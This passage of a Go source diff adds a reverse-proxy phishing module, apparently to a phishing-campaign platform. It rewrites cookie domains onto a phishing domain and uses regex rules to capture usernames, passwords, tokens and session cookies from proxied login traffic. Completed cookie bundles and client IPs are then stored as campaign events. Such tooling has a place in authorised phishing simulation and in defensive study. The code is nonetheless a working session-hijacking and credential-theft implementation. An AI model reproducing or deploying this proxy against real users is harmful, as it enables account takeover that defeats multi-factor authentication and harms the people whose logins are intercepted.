+ } + + if isSecure { + cookieData["secure"] = "true" + } + if cookie.HttpOnly { + cookieData["httpOnly"] = "true" + } + if cookie.SameSite != http.SameSiteDefaultMode { + cookieData["sameSite"] = m.sameSiteToString(cookie.SameSite) + } + if !cookie.Expires.IsZero() && cookie.Expires.Year() > 1 { + cookieData["expires"] = cookie.Expires.Format(time.RFC3339) + } + if cookie.MaxAge > 0 { + cookieData["maxAge"] = fmt.Sprintf("%d", cookie.MaxAge) + } + if resp.Request.Host != cookieDomain { + cookieData["original_host"] = resp.Request.Host + } + + return cookieData +} + +func (m *ProxyHandler) readRequestBody(req *http.Request) []byte { + body, err := io.ReadAll(req.Body) + if err != nil { + m.logger.Errorw("failed to read request body", "error", err) + return nil + } + req.Body.Close() + req.Body = io.NopCloser(bytes.NewBuffer(body)) + return body +} + +func (m *ProxyHandler) captureFromText(text string, capture service.ProxyServiceCaptureRule, session *ProxySession, req *http.Request, captureContext string) { + if capture.Find == "" { + return + } + + re, err := regexp.Compile(capture.Find) + if err != nil { + m.logger.Errorw("invalid capture regex", "error", err, "pattern", capture.Find) + return + } + + matches := re.FindStringSubmatch(text) + if len(matches) == 0 { + return + } + + capturedData := m.buildCapturedData(matches, capture, session, req, captureContext) + session.CapturedData.Store(capture.Name, capturedData) + m.checkCaptureCompletion(session, capture.Name) + + // submit non-cookie captures immediately + if capture.From != "cookie" && session.CampaignRecipientID != nil && session.CampaignID != nil { + m.createCampaignSubmitEvent(session, capturedData, req) + } + + // check if we should submit cookie bundle (only when all captures complete) + m.checkAndSubmitCookieBundleWhenComplete(session, req) + m.handleCampaignFlowProgression(session, req) +} + +func (m *ProxyHandler) buildCapturedData(matches []string, capture service.ProxyServiceCaptureRule, 
session *ProxySession, req *http.Request, captureContext string) map[string]string { + capturedData := make(map[string]string) + + // add capture name to the captured data + capturedData["capture_name"] = capture.Name + + if len(matches) > 1 { + for i := 1; i < len(matches); i++ { + capturedData[fmt.Sprintf("group_%d", i)] = matches[i] + } + m.formatCapturedData(capturedData, capture, matches, session, req, captureContext) + } else { + capturedData["matched"] = matches[0] + } + + return capturedData +} + +func (m *ProxyHandler) formatCapturedData(capturedData map[string]string, capture service.ProxyServiceCaptureRule, matches []string, session *ProxySession, req *http.Request, captureContext string) { + captureName := strings.ToLower(capture.Name) + + switch { + case strings.Contains(captureName, "credential") || strings.Contains(captureName, "login"): + if len(matches) >= 3 { + capturedData["username"] = matches[1] + capturedData["password"] = matches[2] + } + case capture.From == "cookie": + if len(matches) >= 2 { + capturedData["cookie_value"] = matches[1] + domain := session.TargetDomain + if captureContext != "response_header" && captureContext != "response_body" { + domain = req.Host + } + if domain != "" { + capturedData["cookie_domain"] = domain + } + } + case strings.Contains(captureName, "token"): + if len(matches) >= 2 { + capturedData["token_value"] = matches[1] + capturedData["token_type"] = capture.Name + } + } +} + +func (m *ProxyHandler) checkCaptureCompletion(session *ProxySession, captureName string) { + if _, exists := session.RequiredCaptures.Load(captureName); exists { + // only mark as complete if we actually have captured data for this capture + if _, hasData := session.CapturedData.Load(captureName); hasData { + session.RequiredCaptures.Store(captureName, true) + + // check if all required captures are complete + allComplete := true + session.RequiredCaptures.Range(func(key, value interface{}) bool { + if !value.(bool) { + allComplete = 
false + return false + } + return true + }) + session.IsComplete.Store(allComplete) + } + } +} + +func (m *ProxyHandler) checkAndSubmitCookieBundleWhenComplete(session *ProxySession, req *http.Request) { + if session.CampaignRecipientID == nil || session.CampaignID == nil { + return + } + + if session.CookieBundleSubmitted.Load() { + return + } + + // only submit cookie bundle when ALL captures (including non-cookie ones) are complete + // this ensures we capture the final state after all authentication attempts + if !session.IsComplete.Load() { + return + } + + // submit cookie bundle if there are cookie captures + cookieCaptures, requiredCookieCaptures := m.collectCookieCaptures(session) + if m.areAllCookieCapturesComplete(requiredCookieCaptures) && len(cookieCaptures) > 0 { + bundledData := m.createCookieBundle(cookieCaptures, session) + m.createCampaignSubmitEvent(session, bundledData, req) + session.CookieBundleSubmitted.Store(true) + } +} + +func (m *ProxyHandler) collectCookieCaptures(session *ProxySession) (map[string]map[string]string, map[string]bool) { + cookieCaptures := make(map[string]map[string]string) + requiredCookieCaptures := make(map[string]bool) + + session.RequiredCaptures.Range(func(requiredCaptureKey, requiredCaptureValue interface{}) bool { + requiredCaptureName := requiredCaptureKey.(string) + isComplete := requiredCaptureValue.(bool) + + session.Config.Range(func(hostKey, hostValue interface{}) bool { + hostConfig := hostValue.(service.ProxyServiceDomainConfig) + for _, capture := range hostConfig.Capture { + if capture.Name == requiredCaptureName && capture.From == "cookie" { + requiredCookieCaptures[requiredCaptureName] = isComplete + if capturedDataInterface, exists := session.CapturedData.Load(requiredCaptureName); exists { + cookieCaptures[requiredCaptureName] = capturedDataInterface.(map[string]string) + } + return false + } + } + return true + }) + return true + }) + + return cookieCaptures, requiredCookieCaptures +} + +func (m 
*ProxyHandler) areAllCookieCapturesComplete(requiredCookieCaptures map[string]bool) bool { + if len(requiredCookieCaptures) == 0 { + return false + } + + for _, isComplete := range requiredCookieCaptures { + if !isComplete { + return false + } + } + return true +} + +func (m *ProxyHandler) createCookieBundle(cookieCaptures map[string]map[string]string, session *ProxySession) map[string]interface{} { + bundledData := map[string]interface{}{ + "capture_type": "cookie", + "cookie_count": len(cookieCaptures), + "bundle_time": time.Now().Format(time.RFC3339), + "target_domain": session.TargetDomain, + "session_complete": true, + "cookies": make(map[string]interface{}), + } + + cookies := bundledData["cookies"].(map[string]interface{}) + for captureName, cookieData := range cookieCaptures { + cookies[captureName] = cookieData + } + + return bundledData +} + +func (m *ProxyHandler) applyRequestBodyReplacements(req *http.Request, session *ProxySession) { + if req.Body == nil { + return + } + + body := m.readRequestBody(req) + + session.Config.Range(func(key, value interface{}) bool { + hostConfig := value.(service.ProxyServiceDomainConfig) + for _, replacement := range hostConfig.Rewrite { + if replacement.From == "" || replacement.From == "request_body" { + body = m.applyReplacement(body, replacement, session.ID) + } + } + return true + }) + + req.Body = io.NopCloser(bytes.NewBuffer(body)) +} + +func (m *ProxyHandler) applyCustomReplacements(body []byte, session *ProxySession) []byte { + session.Config.Range(func(key, value interface{}) bool { + hostConfig := value.(service.ProxyServiceDomainConfig) + for _, replacement := range hostConfig.Rewrite { + if replacement.From == "" || replacement.From == "response_body" { + body = m.applyReplacement(body, replacement, session.ID) + } + } + return true + }) + return body +} + +// applyCustomReplacementsWithoutSession applies rewrite rules for requests without session context +func (m *ProxyHandler) 
applyCustomReplacementsWithoutSession(body []byte, config map[string]service.ProxyServiceDomainConfig, targetDomain string) []byte { + // apply rewrite rules from all host configurations (matches session behavior) + for _, hostConfig := range config { + for _, replacement := range hostConfig.Rewrite { + if replacement.From == "" || replacement.From == "response_body" { + body = m.applyReplacement(body, replacement, "no-session") + } + } + } + + return body +} + +func (m *ProxyHandler) applyReplacement(body []byte, replacement service.ProxyServiceReplaceRule, sessionID string) []byte { + re, err := regexp.Compile(replacement.Find) + if err != nil { + m.logger.Errorw("invalid replacement regex", "error", err) + return body + } + + oldContent := string(body) + content := re.ReplaceAllString(oldContent, replacement.Replace) + if content != oldContent { + return []byte(content) + } + return body +} + +func (m *ProxyHandler) processCookiesForPhishingDomain(resp *http.Response, ps *ProxySession) { + cookies := resp.Cookies() + if len(cookies) == 0 { + return + } + + phishDomain := ps.Domain.Name + targetDomain, err := m.getTargetDomainForPhishingDomain(phishDomain) + if err != nil { + m.logger.Errorw("failed to get target domain for cookie processing", "error", err, "phishDomain", phishDomain) + return + } + + tempConfig := map[string]service.ProxyServiceDomainConfig{ + targetDomain: {To: phishDomain}, + } + + resp.Header.Del("Set-Cookie") + for _, ck := range cookies { + m.adjustCookieSettings(ck, nil, resp) + m.rewriteCookieDomain(ck, tempConfig, resp) + resp.Header.Add("Set-Cookie", ck.String()) + } +} + +func (m *ProxyHandler) adjustCookieSettings(ck *http.Cookie, session *ProxySession, resp *http.Response) { + if ck.Secure { + ck.SameSite = http.SameSiteNoneMode + } else if ck.SameSite == http.SameSiteDefaultMode { + ck.SameSite = http.SameSiteLaxMode + } + + // handle cookie expiration parsing + if len(ck.RawExpires) > 0 && ck.Expires.IsZero() { + if exptime, err := 
time.Parse(time.RFC850, ck.RawExpires); err == nil { + ck.Expires = exptime + } else if exptime, err := time.Parse(time.ANSIC, ck.RawExpires); err == nil { + ck.Expires = exptime + } else if exptime, err := time.Parse("Monday, 02-Jan-2006 15:04:05 MST", ck.RawExpires); err == nil { + ck.Expires = exptime + } + } +} + +func (m *ProxyHandler) rewriteCookieDomain(ck *http.Cookie, config map[string]service.ProxyServiceDomainConfig, resp *http.Response) { + cDomain := ck.Domain + if cDomain == "" { + cDomain = resp.Request.Host + } else if cDomain[0] != '.' { + cDomain = "." + cDomain + } + + if phishHost := m.replaceHostWithPhished(strings.TrimPrefix(cDomain, "."), config); phishHost != "" { + if strings.HasPrefix(cDomain, ".") { + ck.Domain = "." + phishHost + } else { + ck.Domain = phishHost + } + } else { + ck.Domain = cDomain + } +} + +func (m *ProxyHandler) sameSiteToString(sameSite http.SameSite) string { + switch sameSite { + case http.SameSiteDefaultMode: + return "Default" + case http.SameSiteLaxMode: + return "Lax" + case http.SameSiteStrictMode: + return "Strict" + case http.SameSiteNoneMode: + return "None" + default: + return fmt.Sprintf("Unknown(%d)", int(sameSite)) + } +} + +func (m *ProxyHandler) getCampaignRecipientIDFromURLParams(req *http.Request) (*uuid.UUID, string) { + ctx := req.Context() + + campaignRecipient, paramName, err := server.GetCampaignRecipientFromURLParams( + ctx, + req, + m.IdentifierRepository, + m.CampaignRecipientRepository, + ) + if err != nil { + m.logger.Errorw("failed to get identifiers for URL param extraction", "error", err) + return nil, "" + } + + if campaignRecipient == nil { + return nil, "" + } + + campaignRecipientID := campaignRecipient.ID.MustGet() + return &campaignRecipientID, paramName +} + +// Header normalization methods +func (m *ProxyHandler) normalizeRequestHeaders(req *http.Request, session *ProxySession) { + configMap := m.configToMap(&session.Config) + + // fix origin header + if origin := 
req.Header.Get("Origin"); origin != "" { + if oURL, err := url.Parse(origin); err == nil { + if rHost := m.replaceHostWithOriginal(oURL.Host, configMap); rHost != "" { + oURL.Host = rHost + req.Header.Set("Origin", oURL.String()) + } + } + } + + // fix referer header + if referer := req.Header.Get("Referer"); referer != "" { + if rURL, err := url.Parse(referer); err == nil { + if rHost := m.replaceHostWithOriginal(rURL.Host, configMap); rHost != "" { + rURL.Host = rHost + req.Header.Set("Referer", rURL.String()) + } + } + } + + // prevent caching and fix headers + req.Header.Set("Cache-Control", "no-cache") + + if secFetchDest := req.Header.Get("Sec-Fetch-Dest"); secFetchDest == "iframe" { + req.Header.Set("Sec-Fetch-Dest", "document") + } + + if req.Body != nil && (req.Method == "POST" || req.Method == "PUT" || req.Method == "PATCH") { + if req.Header.Get("Content-Length") == "" && req.ContentLength > 0 { + req.Header.Set("Content-Length", fmt.Sprintf("%d", req.ContentLength)) + } + } +} + +func (m *ProxyHandler) readAndDecompressBody(resp *http.Response) ([]byte, bool, error) { + body, err := io.ReadAll(resp.Body) + if err != nil { + return nil, false, err + } + + encoding := resp.Header.Get("Content-Encoding") + switch strings.ToLower(encoding) { + case "gzip": + gzipReader, err := gzip.NewReader(bytes.NewBuffer(body)) + if err != nil { + return body, false, err + } + defer gzipReader.Close() + decompressed, err := io.ReadAll(gzipReader) + if err != nil { + return body, false, err + } + return decompressed, true, nil + case "deflate": + deflateReader := flate.NewReader(bytes.NewBuffer(body)) + defer deflateReader.Close() + decompressed, err := io.ReadAll(deflateReader) + if err != nil { + return body, false, err + } + return decompressed, true, nil + case "br": + return body, false, nil + default: + return body, false, nil + } +} + +func (m *ProxyHandler) updateResponseBody(resp *http.Response, body []byte, wasCompressed bool) { + if wasCompressed { + encoding 
:= resp.Header.Get("Content-Encoding") + switch strings.ToLower(encoding) { + case "gzip": + var compressedBuffer bytes.Buffer + gzipWriter := gzip.NewWriter(&compressedBuffer) + if _, err := gzipWriter.Write(body); err != nil { + m.logger.Errorw("failed to write gzip compressed body", "error", err) + } + if err := gzipWriter.Close(); err != nil { + m.logger.Errorw("failed to close gzip writer", "error", err) + } + body = compressedBuffer.Bytes() + case "deflate": + var compressedBuffer bytes.Buffer + deflateWriter, err := flate.NewWriter(&compressedBuffer, flate.DefaultCompression) + if err != nil { + m.logger.Errorw("failed to create deflate writer", "error", err) + break + } + if _, err := deflateWriter.Write(body); err != nil { + m.logger.Errorw("failed to write deflate compressed body", "error", err) + } + if err := deflateWriter.Close(); err != nil { + m.logger.Errorw("failed to close deflate writer", "error", err) + } + body = compressedBuffer.Bytes() + } + } + + resp.Body = io.NopCloser(bytes.NewReader(body)) + resp.ContentLength = int64(len(body)) + resp.Header.Set("Content-Length", fmt.Sprintf("%d", len(body))) +} + +func (m *ProxyHandler) shouldProcessContent(contentType string) bool { + processTypes := []string{"text/html", "application/javascript", "application/x-javascript", "text/javascript", "text/css", "application/json"} + for _, pType := range processTypes { + if strings.Contains(contentType, pType) { + return true + } + } + return false +} + +func (m *ProxyHandler) handleImmediateCampaignRedirect(session *ProxySession, resp *http.Response, req *http.Request, captureLocation string) { + m.handleCampaignFlowProgression(session, req) + + nextPageType := session.NextPageType.Load().(string) + if nextPageType == "" { + return + } + + redirectURL := m.buildCampaignFlowRedirectURL(session, nextPageType) + if redirectURL == "" { + return + } + + resp.StatusCode = 302 + resp.Status = "302 Found" + resp.Header.Set("Location", redirectURL) + 
resp.Header.Set("Content-Length", "0") + resp.Header.Set("Cache-Control", "no-cache, no-store, must-revalidate") + resp.Body = io.NopCloser(bytes.NewReader([]byte{})) + session.NextPageType.Store("") +} + +func (m *ProxyHandler) handleCampaignFlowProgression(session *ProxySession, req *http.Request) { + if session.CampaignRecipientID == nil || session.CampaignID == nil { + return + } + + ctx := req.Context() + templateID, err := session.Campaign.TemplateID.Get() + if err != nil { + m.logger.Errorw("failed to get template ID for campaign flow progression", "error", err) + return + } + + cTemplate, err := m.CampaignTemplateRepository.GetByID(ctx, &templateID, &repository.CampaignTemplateOption{}) + if err != nil { + m.logger.Errorw("failed to get campaign template for flow progression", "error", err, "templateID", templateID) + return + } + + currentPageType := m.getCurrentPageType(req, cTemplate, session) + nextPageType := m.getNextPageType(currentPageType, cTemplate) + + if nextPageType != data.PAGE_TYPE_DONE && nextPageType != currentPageType && session.IsComplete.Load() { + session.NextPageType.Store(nextPageType) + } +} + +func (m *ProxyHandler) getCurrentPageType(req *http.Request, template *model.CampaignTemplate, session *ProxySession) string { + if template.StateIdentifier != nil { + stateParamKey := template.StateIdentifier.Name.MustGet() + encryptedParam := req.URL.Query().Get(stateParamKey) + if encryptedParam != "" && session.CampaignID != nil { + secret := utils.UUIDToSecret(session.CampaignID) + if decrypted, err := utils.Decrypt(encryptedParam, secret); err == nil { + return decrypted + } + } + } + + if template.URLIdentifier != nil { + urlParamKey := template.URLIdentifier.Name.MustGet() + campaignRecipientIDParam := req.URL.Query().Get(urlParamKey) + if campaignRecipientIDParam != "" { + if _, errPage := template.BeforeLandingPageID.Get(); errPage == nil { + return data.PAGE_TYPE_BEFORE + } + if _, errProxy := template.BeforeLandingProxyID.Get(); 
errProxy == nil { + return data.PAGE_TYPE_BEFORE + } + return data.PAGE_TYPE_LANDING + } + } + + return data.PAGE_TYPE_LANDING +} + +func (m *ProxyHandler) getNextPageType(currentPageType string, template *model.CampaignTemplate) string { + switch currentPageType { + case data.PAGE_TYPE_BEFORE: + return data.PAGE_TYPE_LANDING + case data.PAGE_TYPE_LANDING: + if _, errPage := template.AfterLandingPageID.Get(); errPage == nil { + return data.PAGE_TYPE_AFTER + } + if _, errProxy := template.AfterLandingProxyID.Get(); errProxy == nil { + return data.PAGE_TYPE_AFTER + } + return data.PAGE_TYPE_DONE + case data.PAGE_TYPE_AFTER: + return data.PAGE_TYPE_DONE + default: + return data.PAGE_TYPE_DONE + } +} + +func (m *ProxyHandler) shouldRedirectForCampaignFlow(session *ProxySession, req *http.Request) bool { + nextPageTypeStr := session.NextPageType.Load().(string) + return nextPageTypeStr != "" && nextPageTypeStr != data.PAGE_TYPE_DONE && session.IsComplete.Load() +} + +func (m *ProxyHandler) createCampaignFlowRedirect(session *ProxySession, resp *http.Response) *http.Response { + if resp == nil { + return nil + } + + nextPageTypeStr := session.NextPageType.Load().(string) + session.NextPageType.Store("") + + redirectURL := m.buildCampaignFlowRedirectURL(session, nextPageTypeStr) + if redirectURL == "" { + return resp + } + + redirectResp := &http.Response{ + Status: "302 Found", + StatusCode: 302, + Proto: resp.Proto, + ProtoMajor: resp.ProtoMajor, + ProtoMinor: resp.ProtoMinor, + Header: make(http.Header), + Body: io.NopCloser(bytes.NewReader([]byte{})), + Request: resp.Request, + } + + redirectResp.Header.Set("Location", redirectURL) + redirectResp.Header.Set("Content-Length", "0") + + return redirectResp +} + +func (m *ProxyHandler) buildCampaignFlowRedirectURL(session *ProxySession, nextPageType string) string { + if session.CampaignRecipientID == nil || session.Campaign == nil { + return "" + } + + templateID, err := session.Campaign.TemplateID.Get() + if err != nil 
{ + m.logger.Errorw("failed to get template ID for redirect URL", "error", err) + return "" + } + + ctx := context.Background() + cTemplate, err := m.CampaignTemplateRepository.GetByID(ctx, &templateID, &repository.CampaignTemplateOption{ + WithDomain: true, + WithIdentifier: true, + }) + if err != nil { + m.logger.Errorw("failed to get campaign template for redirect URL", "error", err, "templateID", templateID) + return "" + } + + var targetURL string + var usesTemplateDomain bool + + switch nextPageType { + case data.PAGE_TYPE_LANDING: + if _, err := cTemplate.LandingPageID.Get(); err == nil { + usesTemplateDomain = true + } + case data.PAGE_TYPE_AFTER: + if _, err := cTemplate.AfterLandingPageID.Get(); err == nil { + usesTemplateDomain = true + } + default: + if redirectURL, err := cTemplate.AfterLandingPageRedirectURL.Get(); err == nil { + if url := redirectURL.String(); len(url) > 0 { + return url + } + } + } + + if usesTemplateDomain && cTemplate.Domain != nil { + domainName, err := cTemplate.Domain.Name.Get() + if err != nil { + m.logger.Errorw("failed to get domain name for redirect URL", "error", err) + return "" + } + + if urlPath, err := cTemplate.URLPath.Get(); err == nil { + targetURL = fmt.Sprintf("https://%s%s", domainName, urlPath.String()) + } else { + targetURL = fmt.Sprintf("https://%s/", domainName) + } + } else if session.Domain != nil { + targetURL = fmt.Sprintf("https://%s/", session.Domain.Name) + } + + if targetURL == "" { + return "" + } + + // add campaign parameters + if cTemplate.URLIdentifier != nil && cTemplate.StateIdentifier != nil { + urlParamKey := cTemplate.URLIdentifier.Name.MustGet() + stateParamKey := cTemplate.StateIdentifier.Name.MustGet() + secret := utils.UUIDToSecret(session.CampaignID) + encryptedPageType, err := utils.Encrypt(nextPageType, secret) + if err != nil { + m.logger.Errorw("failed to encrypt page type for redirect URL", "error", err, "pageType", nextPageType) + return "" + } + separator := "?" 
+ if strings.Contains(targetURL, "?") { + separator = "&" + } + + targetURL = fmt.Sprintf("%s%s%s=%s&%s=%s", + targetURL, separator, urlParamKey, session.CampaignRecipientID.String(), + stateParamKey, encryptedPageType, + ) + } + + return targetURL +} + +func (m *ProxyHandler) createCampaignSubmitEvent(session *ProxySession, capturedData interface{}, req *http.Request) { + if session.CampaignID == nil || session.CampaignRecipientID == nil { + return + } + + ctx := context.Background() + + // get campaign to check SaveSubmittedData setting + campaign, err := m.CampaignRepository.GetByID(ctx, session.CampaignID, &repository.CampaignOption{}) + if err != nil { + m.logger.Errorw("failed to get campaign for proxy capture event", "error", err) + return + } + + // save captured data only if SaveSubmittedData is enabled + var submittedDataJSON []byte + if campaign.SaveSubmittedData.MustGet() { + submittedDataJSON, err = json.Marshal(capturedData) + if err != nil { + m.logger.Errorw("failed to marshal captured data for campaign event", "error", err) + return + } + } else { + // save empty data but still record the capture event + submittedDataJSON = []byte("{}") + } + + submitDataEventID := cache.EventIDByName[data.EVENT_CAMPAIGN_RECIPIENT_SUBMITTED_DATA] + eventID := uuid.New() + + // get real client ip + clientIP := strings.SplitN(req.RemoteAddr, ":", 2)[0] + proxyHeaders := []string{"X-Forwarded-For", "X-Real-IP", "X-Client-IP", "Connecting-IP", "True-Client-IP", "Client-IP"} + for _, header := range proxyHeaders { + if headerValue := req.Header.Get(header); headerValue != "" { + clientIP = strings.SplitN(headerValue, ":", 2)[0] + break + } + } + + event := &model.CampaignEvent{ + ID: &eventID, + CampaignID: session.CampaignID, + RecipientID: session.RecipientID, + EventID: submitDataEventID, + Data: vo.NewOptionalString1MBMust(string(submittedDataJSON)), + IP: vo.NewOptionalString64Must(clientIP), + UserAgent: vo.NewOptionalString255Must(req.UserAgent()), + } + + err = 
m.CampaignRepository.SaveEvent(ctx, event) + if err != nil { + m.logger.Errorw("failed to create campaign submit event", "error", err) + } +} + +func (m *ProxyHandler) parseProxyConfig(configStr string) (*service.ProxyServiceConfigYAML, error) { + var yamlConfig service.ProxyServiceConfigYAML + err := yaml.Unmarshal([]byte(configStr), &yamlConfig) + if err != nil { + return nil, fmt.Errorf("failed to parse YAML config: %w", err) + } + + m.setProxyConfigDefaults(&yamlConfig) + + err = service.CompilePathPatterns(&yamlConfig) + if err != nil { + return nil, fmt.Errorf("failed to compile path patterns: %w", err) + } + + return &yamlConfig, nil +} + +func (m *ProxyHandler) setProxyConfigDefaults(config *service.ProxyServiceConfigYAML) { + if config.Version == "" { + config.Version = "0.0" + } + + for domain, domainConfig := range config.Hosts { + for i := range domainConfig.Capture { + if domainConfig.Capture[i].Required == nil { + trueValue := true + domainConfig.Capture[i].Required = &trueValue + } + } + config.Hosts[domain] = domainConfig + } +} + +func (m *ProxyHandler) ValidateProxyConfig(configStr string) (*service.ProxyServiceConfigYAML, error) { + config, err := m.parseProxyConfig(configStr) + if err != nil { + return nil, fmt.Errorf("failed to parse proxy config: %w", err) + } + + if err := service.ValidateVersion(config); err != nil { + return nil, fmt.Errorf("version validation failed: %w", err) + } + + for originalHost, hostConfig := range config.Hosts { + if hostConfig == nil || hostConfig.To == "" { + return nil, fmt.Errorf("domain mapping for '%s' is empty", originalHost) + } + + for i, capture := range hostConfig.Capture { + if capture.Name == "" { + return nil, fmt.Errorf("capture rule %d for '%s' has no name", i, originalHost) + } + if capture.Find == "" { + return nil, fmt.Errorf("capture rule '%s' for '%s' has no pattern", capture.Name, originalHost) + } + if _, err := regexp.Compile(capture.Find); err != nil { + return nil, fmt.Errorf("capture rule 
'%s' for '%s' has invalid regex: %w", capture.Name, originalHost, err) + } + } + + for i, replace := range hostConfig.Rewrite { + if replace.Name == "" { + return nil, fmt.Errorf("replace rule %d for '%s' has no name", i, originalHost) + } + if replace.Find == "" { + return nil, fmt.Errorf("replace rule '%s' for '%s' has no find pattern", replace.Name, originalHost) + } + if _, err := regexp.Compile(replace.Find); err != nil { + return nil, fmt.Errorf("replace rule '%s' for '%s' has invalid regex: %w", replace.Name, originalHost, err) + } + } + } + + return config, nil +} + +func (m *ProxyHandler) GetCookieName() string { + return m.cookieName +} + +func (m *ProxyHandler) IsValidProxyCookie(cookie string) bool { + return m.isValidSessionCookie(cookie) +} + +func (m *ProxyHandler) CleanupExpiredSessions() { + now := time.Now() + cleanedCount := 0 + + m.sessions.Range(func(key, value interface{}) bool { + sessionID, ok := key.(string) + if !ok { + return true + } + session, ok := value.(*ProxySession) + if !ok { + m.sessions.Delete(sessionID) + cleanedCount++ + return true + } + + sessionAge := now.Sub(session.CreatedAt) + if sessionAge > time.Duration(PROXY_COOKIE_MAX_AGE)*time.Second { + m.sessions.Delete(sessionID) + if session.CampaignRecipientID != nil { + m.campaignRecipientSessions.Delete(session.CampaignRecipientID.String()) + } + cleanedCount++ + } + return true + }) + +} + +func (m *ProxyHandler) getTargetDomainForPhishingDomain(phishingDomain string) (string, error) { + if strings.Contains(phishingDomain, ":") { + phishingDomain = strings.Split(phishingDomain, ":")[0] + } + + var dbDomain database.Domain + result := m.DomainRepository.DB.Where("name = ?", phishingDomain).First(&dbDomain) + if result.Error != nil { + return "", fmt.Errorf("failed to get domain configuration: %w", result.Error) + } + + if dbDomain.Type != "proxy" { + return "", fmt.Errorf("domain is not configured for proxy") + } + + if dbDomain.ProxyTargetDomain == "" { + return "", 
fmt.Errorf("no proxy target domain configured") + } + + targetDomain := dbDomain.ProxyTargetDomain + if strings.Contains(targetDomain, "://") { + if parsedURL, err := url.Parse(targetDomain); err == nil { + return parsedURL.Host, nil + } + } + + return targetDomain, nil +} + +func (m *ProxyHandler) isValidSessionCookie(cookie string) bool { + if cookie == "" { + return false + } + _, exists := m.sessions.Load(cookie) + return exists +} + +func (m *ProxyHandler) configToMap(configMap *sync.Map) map[string]service.ProxyServiceDomainConfig { + result := make(map[string]service.ProxyServiceDomainConfig) + configMap.Range(func(key, value interface{}) bool { + result[key.(string)] = value.(service.ProxyServiceDomainConfig) + return true + }) + return result +} + +func (m *ProxyHandler) createServiceUnavailableResponse(message string) *http.Response { + resp := &http.Response{ + StatusCode: http.StatusServiceUnavailable, + Status: "503 Service Unavailable", + Proto: "HTTP/1.1", + ProtoMajor: 1, + ProtoMinor: 1, + Header: make(http.Header), + Body: io.NopCloser(strings.NewReader(message)), + } + resp.Header.Set("Content-Type", "text/plain") + return resp +} + +func (m *ProxyHandler) writeResponse(w http.ResponseWriter, resp *http.Response) error { + // copy headers + for key, values := range resp.Header { + for _, value := range values { + w.Header().Add(key, value) + } + } + + // set status code + w.WriteHeader(resp.StatusCode) + + // copy body + _, err := io.Copy(w, resp.Body) + return err +} diff --git a/backend/random/generate.go b/backend/random/generate.go index d3f3cd6..9585c3f 100644 --- a/backend/random/generate.go +++ b/backend/random/generate.go @@ -38,3 +38,15 @@ func RandomIntN(n int) (int, error) { } return int(randNum.Int64()), nil } + +// GenerateRandomCookieName generates a random cookie name with length between 8-16 characters +func GenerateRandomCookieName() (string, error) { + // generate random length between 8 and 16 + length, err := RandomIntN(9) // 
0-8, add 8 to get 8-16 + if err != nil { + return "", fmt.Errorf("failed to generate random cookie name length: %w", err) + } + length += 8 // now 8-16 + + return GenerateRandomURLBase64Encoded(length) +} diff --git a/backend/repository/campaignTemplate.go b/backend/repository/campaignTemplate.go index 82ca04d..3651362 100644 --- a/backend/repository/campaignTemplate.go +++ b/backend/repository/campaignTemplate.go @@ -35,14 +35,17 @@ type CampaignTemplateOption struct { UsableOnly bool - WithCompany bool - WithDomain bool - WithLandingPage bool - WithBeforeLandingPage bool - WithAfterLandingPage bool - WithEmail bool - WithSMTPConfiguration bool - WithAPISender bool + WithCompany bool + WithDomain bool + WithLandingPage bool + WithBeforeLandingPage bool + WithAfterLandingPage bool + WithLandingProxy bool + WithBeforeLandingProxy bool + WithAfterLandingProxy bool + WithEmail bool + WithSMTPConfiguration bool + WithAPISender bool // url and cookie keys WithIdentifier bool } @@ -107,6 +110,45 @@ func (r CampaignTemplate) load(o *CampaignTemplateOption, db *gorm.DB) *gorm.DB db = db.Preload("AfterLandingPage") } } + if o.WithLandingProxy { + if len(o.Columns) > 0 { + db = db.Joins(LeftJoinOnWithAlias( + database.CAMPAIGN_TEMPLATE_TABLE, + "landing_proxy_id", + database.PROXY_TABLE, + "id", + "landing_proxy", + )) + } else { + db = db.Preload("LandingProxy") + } + } + if o.WithBeforeLandingProxy { + if len(o.Columns) > 0 { + db = db.Joins(LeftJoinOnWithAlias( + database.CAMPAIGN_TEMPLATE_TABLE, + "before_landing_proxy_id", + database.PROXY_TABLE, + "id", + "before_landing_proxy", + )) + } else { + db = db.Preload("BeforeLandingProxy") + } + } + if o.WithAfterLandingProxy { + if len(o.Columns) > 0 { + db = db.Joins(LeftJoinOnWithAlias( + database.CAMPAIGN_TEMPLATE_TABLE, + "after_landing_proxy_id", + database.PROXY_TABLE, + "id", + "after_landing_proxy", + )) + } else { + db = db.Preload("AfterLandingProxy") + } + } if o.WithEmail { if len(o.Columns) > 0 { @@ -711,6 
+753,18 @@ func ToCampaignTemplate(row *database.CampaignTemplate) (*model.CampaignTemplate if row.BeforeLandingPageID != nil { beforeLandingPageID.Set(*row.BeforeLandingPageID) } + var beforeLandingProxy *model.Proxy + if row.BeforeLandingProxy != nil { + m, err := ToProxy(row.BeforeLandingProxy) + if err != nil { + return nil, errs.Wrap(err) + } + beforeLandingProxy = m + } + beforeLandingProxyID := nullable.NewNullNullable[uuid.UUID]() + if row.BeforeLandingProxyID != nil { + beforeLandingProxyID.Set(*row.BeforeLandingProxyID) + } var landingPage *model.Page if row.LandingPage != nil { p, err := ToPage(row.LandingPage) @@ -723,6 +777,18 @@ func ToCampaignTemplate(row *database.CampaignTemplate) (*model.CampaignTemplate if row.LandingPageID != nil { landingPageID.Set(*row.LandingPageID) } + var landingProxy *model.Proxy + if row.LandingProxy != nil { + m, err := ToProxy(row.LandingProxy) + if err != nil { + return nil, errs.Wrap(err) + } + landingProxy = m + } + landingProxyID := nullable.NewNullNullable[uuid.UUID]() + if row.LandingProxyID != nil { + landingProxyID.Set(*row.LandingProxyID) + } var afterLandingPage *model.Page if row.AfterLandingPage != nil { p, err := ToPage(row.AfterLandingPage) @@ -735,6 +801,18 @@ func ToCampaignTemplate(row *database.CampaignTemplate) (*model.CampaignTemplate if row.AfterLandingPageID != nil { afterLandingPageID.Set(*row.AfterLandingPageID) } + var afterLandingProxy *model.Proxy + if row.AfterLandingProxy != nil { + m, err := ToProxy(row.AfterLandingProxy) + if err != nil { + return nil, errs.Wrap(err) + } + afterLandingProxy = m + } + afterLandingProxyID := nullable.NewNullNullable[uuid.UUID]() + if row.AfterLandingProxyID != nil { + afterLandingProxyID.Set(*row.AfterLandingProxyID) + } redirectURL := nullable.NewNullableWithValue(*vo.NewOptionalString255Must("")) if row.AfterLandingPageRedirectURL != "" { redirectURL.Set(*vo.NewOptionalString255Must(row.AfterLandingPageRedirectURL)) @@ -789,10 +867,16 @@ func 
